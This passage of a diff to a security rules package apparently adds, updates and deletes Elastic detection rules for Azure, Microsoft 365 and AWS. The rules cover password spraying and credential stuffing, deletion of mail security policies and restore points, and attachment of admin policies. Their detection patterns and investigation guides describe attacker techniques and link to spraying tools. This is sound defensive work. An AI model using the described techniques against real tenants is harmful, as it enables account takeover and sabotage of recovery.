VALUES(azure.signinlogs.properties.user_id),\n login_errors = VALUES(azure.signinlogs.result_description),\n unique_login_errors = COUNT_DISTINCT(azure.signinlogs.result_description),\n error_codes = VALUES(azure.signinlogs.properties.status.error_code),\n unique_error_codes = COUNT_DISTINCT(azure.signinlogs.properties.status.error_code),\n request_types = VALUES(azure.signinlogs.properties.incoming_token_type),\n app_names = VALUES(azure.signinlogs.properties.app_display_name),\n ip_list = VALUES(source.ip),\n unique_ips = COUNT_DISTINCT(source.ip),\n source_orgs = VALUES(source.`as`.organization.name),\n countries = VALUES(source.geo.country_name),\n unique_country_count = COUNT_DISTINCT(source.geo.country_name),\n unique_asn_orgs = COUNT_DISTINCT(source.`as`.organization.name),\n first_seen = MIN(@timestamp),\n last_seen = MAX(@timestamp),\n total_attempts = COUNT()\nBY time_window\n\n// Determine brute force behavior type based on statistical thresholds\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen),\n bf_type = CASE(\n // Many users, relatively few distinct login errors, distributed over multiple IPs (but not too many),\n // and happens quickly. Often bots using leaked credentials.\n unique_users >= 10 AND total_attempts >= 30 AND unique_login_errors <= 3\n AND unique_ips >= 5\n AND duration_seconds <= 600\n AND unique_users > unique_ips,\n \"credential_stuffing\",\n\n // One password against many users. Single error (e.g., \"InvalidPassword\"), not necessarily fast.\n unique_users >= 15 AND unique_login_errors == 1 AND total_attempts >= 15 AND duration_seconds <= 1800,\n \"password_spraying\",\n\n // One user targeted repeatedly (same error), OR extremely noisy pattern from many IPs.\n (unique_users == 1 AND unique_login_errors == 1 AND total_attempts >= 30 AND duration_seconds <= 300)\n OR (unique_users <= 3 AND unique_ips > 30 AND total_attempts >= 100),\n \"password_guessing\",\n\n // everything else\n \"other\"\n )\n\n// Only keep columns necessary for detection output/reporting\n| KEEP\n time_window, bf_type, duration_seconds, total_attempts, first_seen, last_seen,\n unique_users, user_id_list, login_errors, unique_login_errors,\n unique_error_codes, error_codes, request_types, app_names,\n ip_list, unique_ips, source_orgs, countries,\n unique_country_count, unique_asn_orgs,\n authentication_requirement, client_app_id, client_app_display_name,\n target_resource_id, target_resource_display_name, conditional_access_status,\n device_detail_browser, device_detail_device_id, device_detail_operating_system,\n incoming_token_type, risk_state, session_id, user_id,\n user_principal_name, result_description, result_signature, result_type\n\n// Remove anything not classified as credential attack activity\n| WHERE bf_type != \"other\"\n", - "references": [ - "https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/", - "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "cca64114-fb8b-11ef-86e2-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - }, - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "cca64114-fb8b-11ef-86e2-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json index c144faaec05..01b8d69452f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json @@ -25,6 +25,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "cca64114-fb8b-11ef-86e2-f661ea17fbce", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json deleted file mode 100644 index 42cec551f00..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", - "false_positives": [ - "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Anti-Phish Policy Deletion\n\nMicrosoft 365's anti-phishing policies enhance security by fine-tuning detection settings to thwart phishing attacks. Adversaries may delete these policies to weaken defenses, facilitating unauthorized access. The detection rule monitors audit logs for successful deletions of anti-phishing policies, signaling potential malicious activity by identifying specific actions and outcomes associated with policy removal.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-AntiPhishPolicy\" to identify the user account responsible for the deletion.\n- Check the event.outcome field to confirm the success of the policy deletion and gather additional context from related logs around the same timestamp.\n- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies, such as unusual login locations or times.\n- Assess whether the user account has been compromised by checking for any unauthorized access attempts or changes in account settings.\n- Evaluate the impact of the deleted anti-phishing policy by reviewing the organization's current phishing protection measures and any recent phishing incidents.\n- Coordinate with the IT security team to determine if the policy deletion was authorized or part of a legitimate change management process.\n\n### False positive analysis\n\n- Routine administrative actions may trigger the rule if IT staff regularly update or remove outdated anti-phishing policies. To manage this, create exceptions for known administrative accounts performing these actions.\n- Scheduled policy reviews might involve the removal of policies as part of a legitimate update process. Document these schedules and exclude them from triggering alerts by setting time-based exceptions.\n- Automated scripts used for policy management can inadvertently cause false positives. Identify and whitelist these scripts to prevent unnecessary alerts.\n- Changes in organizational policy that require the removal of certain anti-phishing policies can be mistaken for malicious activity. Ensure that such changes are communicated and logged, and adjust the rule to recognize these legitimate actions.\n- Test environments where policies are frequently added and removed for validation purposes can generate false positives. Exclude these environments from the rule to avoid confusion.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts and systems to prevent further unauthorized access or data exfiltration.\n- Recreate the deleted anti-phishing policy using the latest security guidelines and ensure it is applied across all relevant user groups.\n- Conduct a thorough review of recent email activity and logs for the affected accounts to identify any phishing emails that may have bypassed security measures.\n- Reset passwords for affected accounts and enforce multi-factor authentication (MFA) to enhance account security.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of broader compromise or if sensitive data has been accessed.\n- Implement enhanced monitoring and alerting for similar actions in the future to quickly detect and respond to any further attempts to delete security policies.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json deleted file mode 100644 index ac10f93e622..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", - "false_positives": [ - "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Malware Filter Policy Deletion\n\nMicrosoft 365 Exchange uses malware filter policies to detect and alert administrators about malware in emails, crucial for maintaining security. Adversaries may delete these policies to bypass detection, facilitating undetected malware distribution. The detection rule monitors audit logs for successful deletions of these policies, signaling potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-MalwareFilterPolicy\" to identify the user account responsible for the deletion.\n- Investigate the event.outcome to confirm the success of the policy deletion and gather additional context from related logs.\n- Check the event.provider \"Exchange\" and event.category \"web\" to ensure the activity is consistent with expected administrative actions.\n- Assess the recent activity of the identified user account for any unusual behavior or signs of compromise, such as unexpected login locations or times.\n- Examine other security alerts or incidents involving the same user account or related systems to identify potential patterns or coordinated attacks.\n- Verify if there are any recent changes in permissions or roles for the user account that could explain the ability to delete the malware filter policy.\n- Coordinate with IT and security teams to determine if the deletion was authorized or if immediate remediation actions are necessary to restore security controls.\n\n### False positive analysis\n\n- Administrative maintenance activities may trigger the rule if administrators are legitimately updating or removing outdated malware filter policies. To manage this, maintain a log of scheduled maintenance activities and cross-reference with alerts to verify legitimacy.\n- Automated scripts or third-party tools used for policy management might inadvertently delete policies, leading to false positives. Ensure these tools are configured correctly and consider excluding their actions from the rule if they are verified as non-threatening.\n- Changes in organizational policy or security strategy might necessitate the removal of certain malware filter policies. Document these changes and create exceptions in the detection rule for these specific actions to prevent unnecessary alerts.\n- User error during policy management could result in accidental deletions. Implement additional verification steps or approval processes for policy deletions to reduce the likelihood of such errors triggering false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected account or system to prevent further unauthorized actions or malware distribution.\n- Recreate the deleted malware filter policy to restore the email security posture and prevent further evasion attempts.\n- Conduct a thorough review of recent audit logs to identify any other suspicious activities or policy changes that may indicate a broader compromise.\n- Reset passwords and enforce multi-factor authentication for the affected account to secure access and prevent further unauthorized actions.\n- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals a larger threat.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities or attempts to bypass security measures.\n- Review and update security policies and configurations to ensure they are robust against similar evasion tactics in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json deleted file mode 100644 index 190b0015e75..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss.", - "false_positives": [ - "Blob permissions may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Blob Permissions Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Blob Permissions Modification\n\nAzure Blob Storage is a service for storing large amounts of unstructured data. It uses Azure RBAC to manage access, ensuring only authorized users can modify or access data. Adversaries may exploit this by altering permissions to gain unauthorized access or disrupt operations. The detection rule monitors specific Azure activity logs for successful permission changes, alerting analysts to potential security breaches or misconfigurations.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal associated with the permission modification event by examining the relevant fields such as `event.dataset` and `azure.activitylogs.operation_name`.\n- Check the `event.outcome` field to confirm the success of the permission modification and gather details on the specific permissions that were altered.\n- Investigate the context of the modification by reviewing recent activities of the identified user or service principal to determine if the change aligns with their typical behavior or role.\n- Assess the potential impact of the permission change on the affected Azure Blob by evaluating the sensitivity of the data and the new access levels granted.\n- Cross-reference the modification event with any recent security alerts or incidents to identify if this change is part of a broader attack pattern or misconfiguration issue.\n- Consult with the relevant data owners or administrators to verify if the permission change was authorized and necessary, and if not, take corrective actions to revert the changes.\n\n### False positive analysis\n\n- Routine administrative changes to Azure Blob permissions by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that frequently perform legitimate permission modifications.\n- Automated scripts or tools used for regular maintenance or deployment might modify permissions as part of their operation. Identify these scripts and exclude their activity from triggering alerts by using specific identifiers or tags associated with the scripts.\n- Scheduled updates or policy changes that involve permission modifications can result in false positives. Document these schedules and adjust the monitoring rules to account for these timeframes, reducing unnecessary alerts.\n- Integration with third-party services that require permission changes might cause alerts. Review and whitelist these services if they are verified and necessary for operations, ensuring they do not trigger false positives.\n\n### Response and remediation\n\n- Immediately revoke any unauthorized permissions identified in the Azure Blob Storage to prevent further unauthorized access or data exposure.\n- Conduct a thorough review of the Azure Activity Logs to identify any other suspicious activities or permission changes that may have occurred around the same time.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized changes and any potential data exposure.\n- Implement additional monitoring on the affected Azure Blob Storage accounts to detect any further unauthorized access attempts or permission modifications.\n- Escalate the incident to the incident response team if there is evidence of a broader security breach or if sensitive data has been compromised.\n- Review and update Azure RBAC policies to ensure that only necessary permissions are granted, and consider implementing more granular access controls to minimize the risk of future unauthorized modifications.\n- Conduct a post-incident analysis to identify the root cause of the permission change and implement measures to prevent similar incidents in the future, such as enhancing logging and alerting capabilities.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and\n event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d79c4b2a-6134-4edd-86e6-564a92a933f9", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1222", - "name": "File and Directory Permissions Modification", - "reference": "https://attack.mitre.org/techniques/T1222/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "d79c4b2a-6134-4edd-86e6-564a92a933f9_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..3b7103ff036 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple Azure Restore Point Collections being deleted by a single user within a short time period. Restore Point Collections contain recovery points for virtual machines, enabling point-in-time recovery capabilities. Mass deletion of these collections is a common tactic used by adversaries during ransomware attacks to prevent victim recovery or to maximize impact during destructive operations. Multiple deletions in rapid succession may indicate malicious intent.", + "false_positives": [ + "Planned decommissioning activities or large-scale infrastructure changes may result in legitimate bulk deletion of Restore Point Collections. Verify with the user and change management processes whether these deletions are authorized. Large-scale migration or cleanup projects should be coordinated and documented to avoid false positives." + ], + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Compute Restore Point Collections Deleted", + "note": "## Triage and analysis\n\n### Investigating Azure Compute Restore Point Collections Deleted\n\nAzure Compute Restore Point Collections are essential for disaster recovery, containing snapshots that enable point-in-time recovery\nof virtual machines. The ability to quickly restore VMs from these recovery points is critical for business continuity and\nincident response.\n\nAdversaries conducting ransomware attacks or destructive operations often target backup and recovery infrastructure to\nprevent victims from recovering their systems without paying a ransom. Mass deletion of Restore Point Collections is a\nkey indicator of such activity and represents a significant threat to an organization's resilience.\n\nThis rule detects when a single user deletes multiple Restore Point Collections within a short time window, which is\nunusual in normal operations and highly suspicious when observed.\n\n### Possible investigation steps\n\n- Identify the user account responsible for the deletions by examining the `azure.activitylogs.identity.claims_initiated_by_user.name` or `user.name` field in the alerts.\n- Review all deletion events from this user in the specified time window to determine the scope and scale of the activity.\n- Check the `azure.resource.id` and `azure.resource.name` fields to identify which Restore Point Collections were deleted and assess their criticality to business operations.\n- Verify whether the user account has legitimate administrative access and whether these deletions were authorized through change management or documented maintenance activities.\n- Investigate the timeline of events leading up to the deletions, looking for other suspicious activities such as:\n - Privilege escalation attempts\n - Deletion of other backup resources (Recovery Services vaults, backup policies)\n - Unusual authentication patterns or geographic anomalies\n - Creation of persistence mechanisms or backdoor accounts\n- Review Azure Activity Logs for any failed deletion attempts or access denied events that might indicate reconnaissance activities preceding the successful deletions.\n- Check for related data destruction activities, such as deletion of virtual machines, disks, or storage accounts.\n- Correlate with sign-in logs to identify any unusual login patterns or potential account compromise indicators.\n\n### False positive analysis\n\n- Large-scale decommissioning projects may involve legitimate deletion of multiple Restore Point Collections. Verify with change management records and create temporary exceptions during documented maintenance windows.\n- Infrastructure migrations from Azure to another platform or between Azure regions may involve cleanup of old restore points. Confirm these activities are planned and documented before excluding them from monitoring.\n- Automated cleanup scripts designed to manage storage costs by removing old restore points might trigger this alert. Identify the service accounts used for these operations and adjust the threshold or create exceptions as appropriate.\n- Testing and development environments that are frequently rebuilt may see regular bulk deletion of resources. Consider excluding non-production environments or adjusting the threshold for these subscriptions.\n- Review the threshold value (currently set to 3) and adjust based on your environment's baseline if legitimate administrative activities are frequently triggering false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further malicious activity. Reset credentials and revoke active sessions.\n- Verify the legitimacy of the deletions with the account owner or their manager. If unauthorized, treat this as a confirmed security incident and activate incident response procedures.\n- Check if any of the deleted Restore Point Collections can be recovered through Azure backup services, soft-delete features, or other recovery mechanisms. Time is critical as retention policies may limit recovery windows.\n- Conduct a comprehensive review of all recent activities by the affected user account across the Azure environment to identify other potentially malicious actions or compromised resources.\n- Assess the current disaster recovery posture and identify which VMs are now missing recovery points. Prioritize creation of new restore points for critical systems if they are unaffected.\n- Review and strengthen access controls for Restore Point Collection management, implementing stricter RBAC policies and requiring multi-factor authentication for privileged operations.\n- If ransomware activity is suspected or confirmed:\n - Activate the organization's ransomware response plan\n - Isolate affected systems to prevent spread\n - Search for ransomware indicators across the environment (encrypted files, ransom notes, suspicious processes)\n - Check for deletion of other recovery resources (Recovery Services vaults, backups, snapshots)\n - Do not pay ransom demands; engage with law enforcement and cybersecurity incident response teams\n- Implement additional monitoring and alerting for related activities such as:\n - Deletion of Recovery Services resources\n - Modifications to backup policies\n - Unusual access to disaster recovery infrastructure\n- Document the incident thoroughly and conduct a post-incident review to identify gaps in security controls and opportunities for improvement.\n- Consider implementing Azure Resource Locks on critical recovery resources to prevent accidental or malicious deletion.\n", + "query": "event.dataset: azure.activitylogs and\n event.action: \"MICROSOFT.COMPUTE/RESTOREPOINTCOLLECTIONS/DELETE\" and\n event.outcome: (Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "azure.activitylogs.resource.id", + "value": 3 + } + ], + "field": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 1 + }, + "id": "d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json b/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json new file mode 100644 index 00000000000..9674ba9b1e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to compromised IAM roles. This rule looks for use of the IAM AttachRolePolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM role.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachRolePolicy` API operation to attach the `AdministratorAccess` policy to the target role." + ], + "from": "now-6m", + "index": [ + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to Role", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to Role\n\nThe `AdministratorAccess` managed policy grants unrestricted privileges. \nWhen attached to a role, it can enable privilege escalation or persistence, especially if the role is assumable by other accounts or services. \nThis rule detects `AttachRolePolicy` events where the `policyName` is `AdministratorAccess`.\n\n#### Possible investigation steps\n\n- **Identify both identities.** \n Determine the calling user or role (`aws.cloudtrail.user_identity.arn`) and the target role (`aws.cloudtrail.request_parameters.roleName`). \n Validate whether this change aligns with intended administrative actions. \n\n- **Review the target role\u2019s trust policy.** \n Examine who can assume the role (`AssumeRolePolicyDocument`). \n If the role is assumable by external accounts, this may indicate a potential persistence or lateral movement path. \n\n- **Review CloudTrail details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields for anomalies. \n Compare with historical operations by the same principal. \n\n- **Correlate with adjacent IAM events.** \n Look for `UpdateAssumeRolePolicy`, `CreateAccessKey`, or `PassRole` calls. \n These often accompany privilege escalation activity. \n\n- **Inspect downstream activity.** \n Query CloudTrail for recent `AssumeRole` calls for the target role \u2014 determine if the newly elevated permissions were used. \n\n### False positive analysis\n\n- **Delegated role management.** \n Cloud administrators may legitimately grant temporary AdministratorAccess for troubleshooting. Confirm through tickets or change logs. \n- **Automation or service-linked roles.** \n Some services attach policies automatically for setup; verify whether the target is a service-linked role. \n\n### Response and remediation\n\n**1. Immediate containment**\n- Detach the policy. Remove the `AdministratorAccess` policy from the target role. \n- Restrict access. Temporarily revoke the caller\u2019s IAM privileges until the legitimacy of the action is confirmed. \n- Audit trust policies. Review the role\u2019s trust relationships to ensure only approved principals can assume it. \n- Rotate credentials for any principals who assumed the affected role during the period of elevated privileges. \n\n**2. Evidence preservation**\n- Export the triggering `AttachRolePolicy` event and related CloudTrail entries \u00b130 minutes from the alert. \n- Preserve AWS Config snapshots and GuardDuty findings for traceability. \n\n**3. Scoping and investigation**\n- Identify if the elevated role was subsequently assumed. \n Correlate by matching 